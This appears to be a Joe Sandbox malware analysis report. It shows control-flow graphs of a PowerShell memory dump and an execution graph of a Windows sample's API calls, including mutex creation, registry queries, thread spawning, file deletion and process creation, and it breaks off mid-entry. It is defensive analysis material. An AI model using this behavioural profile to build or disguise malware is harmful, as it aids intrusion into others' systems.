7ff848e3063e-7ff848e30647 317->321 318->312 322 7ff848e30649-7ff848e30656 321->322 323 7ff848e30660-7ff848e3066f 321->323 322->323 329 7ff848e30658-7ff848e3065e 322->329 329->323 330->331 332 7ff848e3078b 330->332 333 7ff848e307a1 331->333 334 7ff848e307a6-7ff848e30802 331->334 332->331 333->334 336 7ff848e307a3 333->336 339 7ff848e3084c-7ff848e30852 334->339 340 7ff848e30804-7ff848e3080a 334->340 336->334 343 7ff848e30854-7ff848e30856 339->343 340->343 344 7ff848e3080c-7ff848e30837 340->344 345 7ff848e30858-7ff848e30861 343->345 346 7ff848e30863-7ff848e30870 343->346 348 7ff848e3098f-7ff848e309f0 344->348 349 7ff848e3083d-7ff848e30847 344->349 345->346 353 7ff848e30930-7ff848e3093a 346->353 354 7ff848e30876-7ff848e30879 346->354 372 7ff848e309f3-7ff848e30a20 348->372 349->346 352 7ff848e30849-7ff848e3084a 349->352 352->339 357 7ff848e30949-7ff848e3098c 353->357 358 7ff848e3093c-7ff848e30948 353->358 354->353 359 7ff848e3087f-7ff848e30887 354->359 357->348 359->348 362 7ff848e3088d-7ff848e30897 359->362 364 7ff848e30899-7ff848e308a9 362->364 365 7ff848e308b0-7ff848e308b4 362->365 373 7ff848e308ab-7ff848e308ae 364->373 374 7ff848e308df-7ff848e308f9 364->374 365->353 366 7ff848e308b6-7ff848e308b9 365->366 370 7ff848e308bb-7ff848e308c4 366->370 371 7ff848e308d0-7ff848e308d4 366->371 370->371 371->353 379 7ff848e308d6-7ff848e308dc 371->379 385 7ff848e30a25-7ff848e30a41 372->385 373->365 381 7ff848e308fb-7ff848e30909 374->381 379->381 382 7ff848e308de 379->382 387 7ff848e3090b-7ff848e30918 381->387 388 7ff848e30922-7ff848e3092f 381->388 382->374 394 7ff848e30a43 385->394 395 7ff848e30a44-7ff848e30a55 385->395 387->388 391 7ff848e3091a-7ff848e30920 387->391 391->388 394->395 396 7ff848e30a58-7ff848e30a71 395->396 397 7ff848e30a57 395->397 396->372 398 7ff848e30a73-7ff848e30aa1 396->398 397->396 398->385 400 7ff848e30aa3-7ff848e30aa8 398->400 401 7ff848e30aaa 400->401 402 7ff848e30aac-7ff848e30ae4 400->402 401->402 405 7ff848e30aea-7ff848e30af4 402->405 406 7ff848e30c09-7ff848e30cb9 402->406 407 7ff848e30b0d-7ff848e30b12 405->407 408 7ff848e30af6-7ff848e30b03 405->408 443 7ff848e30cbb 406->443 444 7ff848e30cbc-7ff848e30ccd 406->444 409 7ff848e30baa-7ff848e30bb4 407->409 410 7ff848e30b18-7ff848e30b1b 407->410 408->407 417 7ff848e30b05-7ff848e30b0b 408->417 415 7ff848e30bc3-7ff848e30c06 409->415 416 7ff848e30bb6-7ff848e30bc2 409->416 410->409 413 7ff848e30b21-7ff848e30b24 410->413 418 7ff848e30b4b 413->418 419 7ff848e30b26-7ff848e30b49 413->419 415->406 417->407 423 7ff848e30b4d-7ff848e30b4f 418->423 419->423 423->409 427 7ff848e30b51-7ff848e30b5b 423->427 427->409 433 7ff848e30b5d-7ff848e30b67 427->433 435 7ff848e30b69-7ff848e30b73 433->435 437 7ff848e30b7a-7ff848e30b83 435->437 438 7ff848e30b9c-7ff848e30ba9 437->438 439 7ff848e30b85-7ff848e30b92 437->439 439->438 442 7ff848e30b94-7ff848e30b9a 439->442 442->438 443->444 445 7ff848e30ccf 444->445 446 7ff848e30cd0-7ff848e30ce9 444->446 445->446
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2810141330.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ff848e30000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b8b9a0102d43f4378dec6bd87fcc640749bb477cb67858669a673f894f90025
                                            • Instruction ID: 785a3f7a8ff76f22103693d0dd043342549b393da7a270331378bb7a29743a3f
                                            • Opcode Fuzzy Hash: 8b8b9a0102d43f4378dec6bd87fcc640749bb477cb67858669a673f894f90025
                                            • Instruction Fuzzy Hash: 45621322E1EB895FE7A6BB2858252B57BE0FF56750F0801FBD04DC7193DA289C05C396

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 500 7ff848e30a68-7ff848e30a71 501 7ff848e309f3-7ff848e30a20 500->501 502 7ff848e30a73-7ff848e30aa1 500->502 505 7ff848e30a25-7ff848e30a41 501->505 504 7ff848e30aa3-7ff848e30aa8 502->504 502->505 507 7ff848e30aaa 504->507 508 7ff848e30aac-7ff848e30ae4 504->508 518 7ff848e30a43 505->518 519 7ff848e30a44-7ff848e30a55 505->519 507->508 513 7ff848e30aea-7ff848e30af4 508->513 514 7ff848e30c09-7ff848e30cb9 508->514 516 7ff848e30b0d-7ff848e30b12 513->516 517 7ff848e30af6-7ff848e30b03 513->517 556 7ff848e30cbb 514->556 557 7ff848e30cbc-7ff848e30ccd 514->557 520 7ff848e30baa-7ff848e30bb4 516->520 521 7ff848e30b18-7ff848e30b1b 516->521 517->516 530 7ff848e30b05-7ff848e30b0b 517->530 518->519 522 7ff848e30a58-7ff848e30a71 519->522 523 7ff848e30a57 519->523 528 7ff848e30bc3-7ff848e30c06 520->528 529 7ff848e30bb6-7ff848e30bc2 520->529 521->520 526 7ff848e30b21-7ff848e30b24 521->526 522->501 522->502 523->522 531 7ff848e30b4b 526->531 532 7ff848e30b26-7ff848e30b49 526->532 528->514 530->516 536 7ff848e30b4d-7ff848e30b4f 531->536 532->536 536->520 540 7ff848e30b51-7ff848e30b5b 536->540 540->520 546 7ff848e30b5d-7ff848e30b73 540->546 550 7ff848e30b7a-7ff848e30b83 546->550 551 7ff848e30b9c-7ff848e30ba9 550->551 552 7ff848e30b85-7ff848e30b92 550->552 552->551 555 7ff848e30b94-7ff848e30b9a 552->555 555->551 556->557 558 7ff848e30ccf 557->558 559 7ff848e30cd0-7ff848e30ce9 557->559 558->559
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2810141330.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ff848e30000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9086876b4dbcd3fdd1ebea3de7adf5c5de5f24f61fcc60f0117cd9e1257e220
                                            • Instruction ID: 6c1930424ad6563bddd9c096a3dcaa8d1d8c6c2a3241671dc10ac6bad4a9e518
                                            • Opcode Fuzzy Hash: c9086876b4dbcd3fdd1ebea3de7adf5c5de5f24f61fcc60f0117cd9e1257e220
                                            • Instruction Fuzzy Hash: C541E122D1EBCA5FE766B62818282B56FE1EF46794F0901F7C488C71E3DA289C058756

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 561 7ff848e305b9-7ff848e305c5 563 7ff848e305cb-7ff848e305ce 561->563 564 7ff848e30670-7ff848e3067a 561->564 565 7ff848e305d0-7ff848e305e3 563->565 566 7ff848e305e5 563->566 567 7ff848e3068b-7ff848e306a9 564->567 568 7ff848e3067c-7ff848e3068a 564->568 570 7ff848e305e7-7ff848e305e9 565->570 566->570 581 7ff848e306ac-7ff848e30717 567->581 570->564 572 7ff848e305ef-7ff848e305f5 570->572 573 7ff848e30611-7ff848e30617 572->573 574 7ff848e305f7-7ff848e30604 572->574 577 7ff848e30619-7ff848e30631 573->577 578 7ff848e30633-7ff848e30637 573->578 574->573 579 7ff848e30606-7ff848e3060f 574->579 577->578 582 7ff848e3063e-7ff848e30647 578->582 579->573 594 7ff848e30719-7ff848e30787 581->594 584 7ff848e30649-7ff848e30656 582->584 585 7ff848e30660-7ff848e3066f 582->585 584->585 590 7ff848e30658-7ff848e3065e 584->590 590->585 601 7ff848e30789 594->601 602 7ff848e3078e-7ff848e3079f 594->602 601->602 603 7ff848e3078b 601->603 604 7ff848e307a1 602->604 605 7ff848e307a6-7ff848e30802 602->605 603->602 604->605 606 7ff848e307a3 604->606 609 7ff848e3084c-7ff848e30852 605->609 610 7ff848e30804-7ff848e3080a 605->610 606->605 613 7ff848e30854-7ff848e30856 609->613 610->613 614 7ff848e3080c-7ff848e30837 610->614 615 7ff848e30858-7ff848e30861 613->615 616 7ff848e30863-7ff848e30870 613->616 618 7ff848e3098f-7ff848e309f0 614->618 619 7ff848e3083d-7ff848e30847 614->619 615->616 623 7ff848e30930-7ff848e3093a 616->623 624 7ff848e30876-7ff848e30879 616->624 642 7ff848e309f3-7ff848e30a20 618->642 619->616 622 7ff848e30849-7ff848e3084a 619->622 622->609 627 7ff848e30949-7ff848e3098c 623->627 628 7ff848e3093c-7ff848e30948 623->628 624->623 629 7ff848e3087f-7ff848e30887 624->629 627->618 629->618 632 7ff848e3088d-7ff848e30897 629->632 634 7ff848e30899-7ff848e308a9 632->634 635 7ff848e308b0-7ff848e308b4 632->635 643 7ff848e308ab-7ff848e308ae 634->643 644 7ff848e308df-7ff848e308f9 634->644 635->623 636 7ff848e308b6-7ff848e308b9 635->636 640 7ff848e308bb-7ff848e308c4 636->640 641 7ff848e308d0-7ff848e308d4 636->641 640->641 641->623 649 7ff848e308d6-7ff848e308dc 641->649 655 7ff848e30a25-7ff848e30a41 642->655 643->635 651 7ff848e308fb-7ff848e30909 644->651 649->651 652 7ff848e308de 649->652 657 7ff848e3090b-7ff848e30918 651->657 658 7ff848e30922-7ff848e3092f 651->658 652->644 664 7ff848e30a43 655->664 665 7ff848e30a44-7ff848e30a55 655->665 657->658 661 7ff848e3091a-7ff848e30920 657->661 661->658 664->665 666 7ff848e30a58-7ff848e30a71 665->666 667 7ff848e30a57 665->667 666->642 668 7ff848e30a73-7ff848e30aa1 666->668 667->666 668->655 670 7ff848e30aa3-7ff848e30aa8 668->670 671 7ff848e30aaa 670->671 672 7ff848e30aac-7ff848e30ae4 670->672 671->672 675 7ff848e30aea-7ff848e30af4 672->675 676 7ff848e30c09-7ff848e30cb9 672->676 677 7ff848e30b0d-7ff848e30b12 675->677 678 7ff848e30af6-7ff848e30b03 675->678 713 7ff848e30cbb 676->713 714 7ff848e30cbc-7ff848e30ccd 676->714 679 7ff848e30baa-7ff848e30bb4 677->679 680 7ff848e30b18-7ff848e30b1b 677->680 678->677 687 7ff848e30b05-7ff848e30b0b 678->687 685 7ff848e30bc3-7ff848e30c06 679->685 686 7ff848e30bb6-7ff848e30bc2 679->686 680->679 683 7ff848e30b21-7ff848e30b24 680->683 688 7ff848e30b4b 683->688 689 7ff848e30b26-7ff848e30b49 683->689 685->676 687->677 693 7ff848e30b4d-7ff848e30b4f 688->693 689->693 693->679 697 7ff848e30b51-7ff848e30b5b 693->697 697->679 703 7ff848e30b5d-7ff848e30b73 697->703 707 7ff848e30b7a-7ff848e30b83 703->707 708 7ff848e30b9c-7ff848e30ba9 707->708 709 7ff848e30b85-7ff848e30b92 707->709 709->708 712 7ff848e30b94-7ff848e30b9a 709->712 712->708 713->714 715 7ff848e30ccf 714->715 716 7ff848e30cd0-7ff848e30ce9 714->716 715->716
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.2810141330.00007FF848E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_7ff848e30000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79e99b0e7da4f20e6e885ef19570d23f0199159da6c1798f172c67c43f837d05
                                            • Instruction ID: 57091b85f6b11e3e4f058f15484273443400c9285e7d31574f0a1c1e8ac66688
                                            • Opcode Fuzzy Hash: 79e99b0e7da4f20e6e885ef19570d23f0199159da6c1798f172c67c43f837d05
                                            • Instruction Fuzzy Hash: 98112B52F1EE5E5FF2B9B62C281917866C1FF84AA0F4801BBC41DC358ADE19AD01019D

                                            Execution Graph

                                            Execution Coverage:1.2%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:2.2%
                                            Total number of Nodes:544
                                            Total number of Limit Nodes:10
                                            execution_graph 47136 404e26 WaitForSingleObject 47137 404e40 SetEvent CloseHandle 47136->47137 47138 404e57 closesocket 47136->47138 47139 404ed8 47137->47139 47140 404e64 47138->47140 47141 404e7a 47140->47141 47149 4050e4 83 API calls 47140->47149 47142 404e8c WaitForSingleObject 47141->47142 47143 404ece SetEvent CloseHandle 47141->47143 47150 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47142->47150 47143->47139 47146 404e9b SetEvent WaitForSingleObject 47151 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47146->47151 47148 404eb3 SetEvent CloseHandle CloseHandle 47148->47143 47149->47141 47150->47146 47151->47148 47152 434918 47153 434924 CallCatchBlock 47152->47153 47178 434627 47153->47178 47155 43492b 47157 434954 47155->47157 47473 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47155->47473 47158 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47157->47158 47474 4442d2 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47157->47474 47163 4349f3 47158->47163 47476 443487 35 API calls 5 library calls 47158->47476 47160 43496d 47162 434973 CallCatchBlock 47160->47162 47475 444276 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 47160->47475 47189 434ba5 47163->47189 47173 434a1f 47175 434a28 47173->47175 47477 443462 28 API calls _Atexit 47173->47477 47478 43479e 13 API calls 2 library calls 47175->47478 47179 434630 47178->47179 47479 434cb6 IsProcessorFeaturePresent 47179->47479 47181 43463c 47480 438fb1 10 API calls 4 library calls 47181->47480 47183 434641 47184 434645 47183->47184 47481 44415f 47183->47481 47184->47155 47187 43465c 47187->47155 47547 436f10 47189->47547 47192 4349f9 47193 444223 47192->47193 47549 44f0d9 47193->47549 47195 434a02 47198 40ea00 47195->47198 47196 44422c 47196->47195 47553 446895 35 API calls 47196->47553 47555 41cbe1 LoadLibraryA GetProcAddress 47198->47555 47200 40ea1c GetModuleFileNameW 47560 40f3fe 47200->47560 47202 40ea38 47575 4020f6 47202->47575 47205 4020f6 28 API calls 47206 40ea56 47205->47206 47581 41beac 47206->47581 47210 40ea68 47607 401e8d 47210->47607 47212 40ea71 47213 40ea84 47212->47213 47214 40eace 47212->47214 47637 40fbee 116 API calls 47213->47637 47613 401e65 22 API calls 47214->47613 47217 40eade 47614 401e65 22 API calls 47217->47614 47218 40ea96 47638 401e65 22 API calls 47218->47638 47220 40eaa2 47639 410f72 36 API calls __EH_prolog 47220->47639 47222 40eafd 47615 40531e 28 API calls 47222->47615 47225 40eab4 47640 40fb9f 77 API calls 47225->47640 47226 40eb0c 47616 406383 28 API calls 47226->47616 47229 40eb18 47617 401fe2 47229->47617 47230 40eabd 47641 40f3eb 70 API calls 47230->47641 47236 401fd8 11 API calls 47238 40ef36 47236->47238 47237 401fd8 11 API calls 47239 40eb36 47237->47239 47468 443396 GetModuleHandleW 47238->47468 47629 401e65 22 API calls 47239->47629 47241 40eb3f 47630 401fc0 28 API calls 47241->47630 47243 40eb4a 47631 401e65 22 API calls 47243->47631 47245 40eb63 47632 401e65 22 API calls 47245->47632 47247 40eb7e 47248 40ebe9 47247->47248 47642 406c59 28 API calls 47247->47642 47633 401e65 22 API calls 47248->47633 47251 40ebab 47252 401fe2 28 API calls 47251->47252 47253 40ebb7 47252->47253 47256 401fd8 11 API calls 47253->47256 47254 40ebf6 47255 40ec3d 47254->47255 47644 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47254->47644 47634 40d0a4 47255->47634 47258 40ebc0 47256->47258 47643 413584 RegOpenKeyExA RegQueryValueExA RegCloseKey 47258->47643 47259 40ec43 47260 40eac6 47259->47260 47646 41b354 33 API calls 47259->47646 47260->47236 47264 40ebdf 47264->47248 47265 40f38a 47264->47265 47729 4139e4 30 API calls 47265->47729 47266 40ec5e 47268 40ecb1 47266->47268 47647 407751 RegOpenKeyExA RegQueryValueExA RegCloseKey 47266->47647 47267 40ec21 47267->47255 47645 4139e4 30 API calls 47267->47645 47652 401e65 22 API calls 47268->47652 47273 40f3a0 47730 4124b0 65 API calls ___scrt_get_show_window_mode 47273->47730 47274 40ecba 47281 40ecc6 47274->47281 47282 40eccb 47274->47282 47275 40ec79 47276 40ec87 47275->47276 47277 40ec7d 47275->47277 47650 401e65 22 API calls 47276->47650 47648 407773 30 API calls 47277->47648 47653 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47281->47653 47654 401e65 22 API calls 47282->47654 47283 40ec82 47649 40729b 97 API calls 47283->47649 47288 40f3ba 47732 413a5e RegOpenKeyExW RegDeleteValueW 47288->47732 47289 40ecd4 47655 41bcef 28 API calls 47289->47655 47291 40ec90 47291->47268 47295 40ecac 47291->47295 47292 40ecdf 47656 401f13 28 API calls 47292->47656 47651 40729b 97 API calls 47295->47651 47296 40f3cd 47733 401f09 11 API calls 47296->47733 47297 40ecea 47657 401f09 11 API calls 47297->47657 47301 40f3d7 47734 401f09 11 API calls 47301->47734 47303 40ecf3 47658 401e65 22 API calls 47303->47658 47304 40f3e0 47735 40dd7d 27 API calls 47304->47735 47307 40ecfc 47659 401e65 22 API calls 47307->47659 47308 40f3e5 47736 414f65 167 API calls _strftime 47308->47736 47312 40ed16 47660 401e65 22 API calls 47312->47660 47314 40ed30 47661 401e65 22 API calls 47314->47661 47316 40ed49 47317 40edbb 47316->47317 47662 401e65 22 API calls 47316->47662 47318 40edc5 47317->47318 47325 40ef41 ___scrt_get_show_window_mode 47317->47325 47320 40edce 47318->47320 47326 40ee4a 47318->47326 47668 401e65 22 API calls 47320->47668 47322 40edd7 47669 401e65 22 API calls 47322->47669 47323 40ed5e _wcslen 47323->47317 47663 401e65 22 API calls 47323->47663 47679 413733 RegOpenKeyExA RegQueryValueExA RegCloseKey 47325->47679 47350 40ee45 ___scrt_get_show_window_mode 47326->47350 47328 40ede9 47670 401e65 22 API calls 47328->47670 47329 40ed79 47664 401e65 22 API calls 47329->47664 47333 40edfb 47671 401e65 22 API calls 47333->47671 47334 40ed8e 47665 40da6f 31 API calls 47334->47665 47335 40ef8c 47680 401e65 22 API calls 47335->47680 47338 40ee24 47672 401e65 22 API calls 47338->47672 47339 40efb1 47681 402093 28 API calls 47339->47681 47341 40eda1 47666 401f13 28 API calls 47341->47666 47343 40edad 47667 401f09 11 API calls 47343->47667 47347 40ee35 47673 40ce34 45 API calls _wcslen 47347->47673 47348 40efc3 47682 4137aa 14 API calls 47348->47682 47349 40edb6 47349->47317 47350->47326 47674 413982 31 API calls 47350->47674 47354 40eede ctype 47675 401e65 22 API calls 47354->47675 47355 40efd9 47683 401e65 22 API calls 47355->47683 47357 40efe5 47684 43bb2c 39 API calls _strftime 47357->47684 47360 40eff2 47362 40f01f 47360->47362 47685 41ce2c 86 API calls ___scrt_get_show_window_mode 47360->47685 47361 40eef5 47361->47335 47676 401e65 22 API calls 47361->47676 47686 402093 28 API calls 47362->47686 47365 40ef12 47677 41bcef 28 API calls 47365->47677 47366 40f003 CreateThread 47366->47362 47827 41d4ee 10 API calls 47366->47827 47369 40ef1e 47678 40f4af 103 API calls 47369->47678 47370 40f034 47687 402093 28 API calls 47370->47687 47373 40f043 47688 41b580 79 API calls 47373->47688 47374 40ef23 47374->47335 47376 40ef2a 47374->47376 47376->47260 47377 40f048 47689 401e65 22 API calls 47377->47689 47379 40f054 47690 401e65 22 API calls 47379->47690 47381 40f066 47691 401e65 22 API calls 47381->47691 47383 40f086 47692 43bb2c 39 API calls _strftime 47383->47692 47385 40f093 47693 401e65 22 API calls 47385->47693 47387 40f09e 47694 401e65 22 API calls 47387->47694 47389 40f0af 47695 401e65 22 API calls 47389->47695 47391 40f0c4 47696 401e65 22 API calls 47391->47696 47393 40f0d5 47394 40f0dc StrToIntA 47393->47394 47697 409e1f 169 API calls _wcslen 47394->47697 47396 40f0ee 47698 401e65 22 API calls 47396->47698 47398 40f0f7 47399 40f13c 47398->47399 47699 43455e 47398->47699 47707 401e65 22 API calls 47399->47707 47404 40f11f 47407 40f126 CreateThread 47404->47407 47405 40f194 47709 401e65 22 API calls 47405->47709 47406 40f14c 47406->47405 47408 43455e new 22 API calls 47406->47408 47407->47399 47831 41a045 102 API calls 2 library calls 47407->47831 47410 40f161 47408->47410 47708 401e65 22 API calls 47410->47708 47412 40f173 47417 40f17a CreateThread 47412->47417 47413 40f207 47715 401e65 22 API calls 47413->47715 47414 40f19d 47414->47413 47710 401e65 22 API calls 47414->47710 47417->47405 47828 41a045 102 API calls 2 library calls 47417->47828 47418 40f1b9 47711 401e65 22 API calls 47418->47711 47419 40f255 47720 41b69e 79 API calls 47419->47720 47420 40f210 47420->47419 47716 401e65 22 API calls 47420->47716 47424 40f1ce 47712 40da23 31 API calls 47424->47712 47425 40f25e 47721 401f13 28 API calls 47425->47721 47426 40f225 47717 401e65 22 API calls 47426->47717 47428 40f269 47722 401f09 11 API calls 47428->47722 47432 40f1e1 47713 401f13 28 API calls 47432->47713 47433 40f272 CreateThread 47438 40f293 CreateThread 47433->47438 47439 40f29f 47433->47439 47829 40f7e2 120 API calls 47433->47829 47434 40f23a 47718 43bb2c 39 API calls _strftime 47434->47718 47437 40f1ed 47714 401f09 11 API calls 47437->47714 47438->47439 47830 412132 137 API calls 47438->47830 47441 40f2b4 47439->47441 47442 40f2a8 CreateThread 47439->47442 47446 40f307 47441->47446 47723 402093 28 API calls 47441->47723 47442->47441 47825 412716 38 API calls ___scrt_get_show_window_mode 47442->47825 47444 40f1f6 CreateThread 47444->47413 47826 401be9 49 API calls _strftime 47444->47826 47445 40f247 47719 40c19d 7 API calls 47445->47719 47725 41353a RegOpenKeyExA RegQueryValueExA RegCloseKey 47446->47725 47449 40f2d7 47724 4052fd 28 API calls 47449->47724 47452 40f31f 47452->47304 47726 41bcef 28 API calls 47452->47726 47457 40f338 47727 413656 31 API calls 47457->47727 47462 40f34e 47728 401f09 11 API calls 47462->47728 47464 40f381 DeleteFileW 47465 40f388 47464->47465 47466 40f359 47464->47466 47731 41bcef 28 API calls 47465->47731 47466->47464 47466->47465 47467 40f36f Sleep 47466->47467 47467->47466 47469 434a15 47468->47469 47469->47173 47470 4434bf 47469->47470 47833 44323c 47470->47833 47473->47155 47474->47160 47475->47158 47476->47163 47477->47175 47478->47162 47479->47181 47480->47183 47485 44fbe8 47481->47485 47484 438fda 8 API calls 3 library calls 47484->47184 47486 44fc05 47485->47486 47489 44fc01 47485->47489 47486->47489 47491 449d26 47486->47491 47488 43464e 47488->47187 47488->47484 47503 43502b 47489->47503 47492 449d32 CallCatchBlock 47491->47492 47510 445909 EnterCriticalSection 47492->47510 47494 449d39 47511 450203 47494->47511 47496 449d48 47497 449d57 47496->47497 47522 449bba 23 API calls 47496->47522 47524 449d73 LeaveCriticalSection std::_Lockit::~_Lockit 47497->47524 47500 449d68 CallCatchBlock 47500->47486 47501 449d52 47523 449c70 GetStdHandle GetFileType 47501->47523 47504 435036 IsProcessorFeaturePresent 47503->47504 47505 435034 47503->47505 47507 435078 47504->47507 47505->47488 47546 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47507->47546 47509 43515b 47509->47488 47510->47494 47512 45020f CallCatchBlock 47511->47512 47513 450233 47512->47513 47514 45021c 47512->47514 47525 445909 EnterCriticalSection 47513->47525 47533 44062d 20 API calls __dosmaperr 47514->47533 47517 45026b 47534 450292 LeaveCriticalSection std::_Lockit::~_Lockit 47517->47534 47519 450221 __cftof CallCatchBlock 47519->47496 47520 45023f 47520->47517 47526 450154 47520->47526 47522->47501 47523->47497 47524->47500 47525->47520 47535 445b74 47526->47535 47528 450173 47543 446802 20 API calls _free 47528->47543 47529 450166 47529->47528 47542 448b04 11 API calls 2 library calls 47529->47542 47531 4501c5 47531->47520 47533->47519 47534->47519 47540 445b81 ___crtLCMapStringA 47535->47540 47536 445bc1 47545 44062d 20 API calls __dosmaperr 47536->47545 47537 445bac RtlAllocateHeap 47539 445bbf 47537->47539 47537->47540 47539->47529 47540->47536 47540->47537 47544 443001 7 API calls 2 library calls 47540->47544 47542->47529 47543->47531 47544->47540 47545->47539 47546->47509 47548 434bb8 GetStartupInfoW 47547->47548 47548->47192 47550 44f0eb 47549->47550 47551 44f0e2 47549->47551 47550->47196 47554 44efd8 48 API calls 4 library calls 47551->47554 47553->47196 47554->47550 47556 41cc20 LoadLibraryA GetProcAddress 47555->47556 47557 41cc10 GetModuleHandleA GetProcAddress 47555->47557 47558 41cc49 44 API calls 47556->47558 47559 41cc39 LoadLibraryA GetProcAddress 47556->47559 47557->47556 47558->47200 47559->47558 47737 41b539 FindResourceA 47560->47737 47564 40f428 _Yarn 47747 4020b7 47564->47747 47567 401fe2 28 API calls 47568 40f44e 47567->47568 47569 401fd8 11 API calls 47568->47569 47570 40f457 47569->47570 47571 43bda0 _Yarn 21 API calls 47570->47571 47572 40f468 _Yarn 47571->47572 47753 406e13 47572->47753 47574 40f49b 47574->47202 47576 40210c 47575->47576 47577 4023ce 11 API calls 47576->47577 47578 402126 47577->47578 47579 402569 28 API calls 47578->47579 47580 402134 47579->47580 47580->47205 47807 4020df 47581->47807 47583 41bf2f 47584 401fd8 11 API calls 47583->47584 47585 41bf61 47584->47585 47587 401fd8 11 API calls 47585->47587 47586 41bf31 47813 4041a2 28 API calls 47586->47813 47590 41bf69 47587->47590 47591 401fd8 11 API calls 47590->47591 47593 40ea5f 47591->47593 47592 41bf3d 47594 401fe2 28 API calls 47592->47594 47603 40fb52 47593->47603 47596 41bf46 47594->47596 47595 401fe2 28 API calls 47602 41bebf 47595->47602 47597 401fd8 11 API calls 47596->47597 47599 41bf4e 47597->47599 47598 401fd8 11 API calls 47598->47602 47814 41cec5 28 API calls 47599->47814 47602->47583 47602->47586 47602->47595 47602->47598 47811 4041a2 28 API calls 47602->47811 47812 41cec5 28 API calls 47602->47812 47604 40fb5e 47603->47604 47606 40fb65 47603->47606 47815 402163 11 API calls 47604->47815 47606->47210 47608 402163 47607->47608 47612 40219f 47608->47612 47816 402730 11 API calls 47608->47816 47610 402184 47817 402712 11 API calls std::_Deallocate 47610->47817 47612->47212 47613->47217 47614->47222 47615->47226 47616->47229 47618 401ff1 47617->47618 47625 402039 47617->47625 47619 4023ce 11 API calls 47618->47619 47620 401ffa 47619->47620 47621 40203c 47620->47621 47622 402015 47620->47622 47819 40267a 11 API calls 47621->47819 47818 403098 28 API calls 47622->47818 47626 401fd8 47625->47626 47627 4023ce 11 API calls 47626->47627 47628 401fe1 47627->47628 47628->47237 47629->47241 47630->47243 47631->47245 47632->47247 47633->47254 47820 401fab 47634->47820 47636 40d0ae CreateMutexA GetLastError 47636->47259 47637->47218 47638->47220 47639->47225 47640->47230 47642->47251 47643->47264 47644->47267 47645->47255 47646->47266 47647->47275 47648->47283 47649->47276 47650->47291 47651->47268 47652->47274 47653->47282 47654->47289 47655->47292 47656->47297 47657->47303 47658->47307 47659->47312 47660->47314 47661->47316 47662->47323 47663->47329 47664->47334 47665->47341 47666->47343 47667->47349 47668->47322 47669->47328 47670->47333 47671->47338 47672->47347 47673->47350 47674->47354 47675->47361 47676->47365 47677->47369 47678->47374 47679->47335 47680->47339 47681->47348 47682->47355 47683->47357 47684->47360 47685->47366 47686->47370 47687->47373 47688->47377 47689->47379 47690->47381 47691->47383 47692->47385 47693->47387 47694->47389 47695->47391 47696->47393 47697->47396 47698->47398 47703 434563 47699->47703 47700 43bda0 _Yarn 21 API calls 47700->47703 47701 40f10c 47706 401e65 22 API calls 47701->47706 47703->47700 47703->47701 47821 443001 7 API calls 2 library calls 47703->47821 47822 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47703->47822 47823 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47703->47823 47706->47404 47707->47406 47708->47412 47709->47414 47710->47418 47711->47424 47712->47432 47713->47437 47714->47444 47715->47420 47716->47426 47717->47434 47718->47445 47719->47419 47720->47425 47721->47428 47722->47433 47723->47449 47725->47452 47726->47457 47727->47462 47728->47466 47729->47273 47731->47288 47732->47296 47733->47301 47734->47304 47735->47308 47824 41ada8 104 API calls 47736->47824 47738 41b556 LoadResource LockResource SizeofResource 47737->47738 47739 40f419 47737->47739 47738->47739 47740 43bda0 47739->47740 47746 4461b8 ___crtLCMapStringA 47740->47746 47741 4461f6 47757 44062d 20 API calls __dosmaperr 47741->47757 47743 4461e1 RtlAllocateHeap 47744 4461f4 47743->47744 47743->47746 47744->47564 47746->47741 47746->47743 47756 443001 7 API calls 2 library calls 47746->47756 47748 4020bf 47747->47748 47758 4023ce 47748->47758 47750 4020ca 47762 40250a 47750->47762 47752 4020d9 47752->47567 47754 4020b7 28 API calls 47753->47754 47755 406e27 47754->47755 47755->47574 47756->47746 47757->47744 47759 402428 47758->47759 47760 4023d8 47758->47760 47759->47750 47760->47759 47769 4027a7 11 API calls std::_Deallocate 47760->47769 47763 40251a 47762->47763 47764 402520 47763->47764 47765 402535 47763->47765 47770 402569 47764->47770 47780 4028e8 47765->47780 47768 402533 47768->47752 47769->47759 47791 402888 47770->47791 47772 40257d 47773 402592 47772->47773 47774 4025a7 47772->47774 47796 402a34 22 API calls 47773->47796 47776 4028e8 28 API calls 47774->47776 47779 4025a5 47776->47779 47777 40259b 47797 4029da 22 API calls 47777->47797 47779->47768 47781 4028f1 47780->47781 47782 402953 47781->47782 47783 4028fb 47781->47783 47805 4028a4 22 API calls 47782->47805 47786 402904 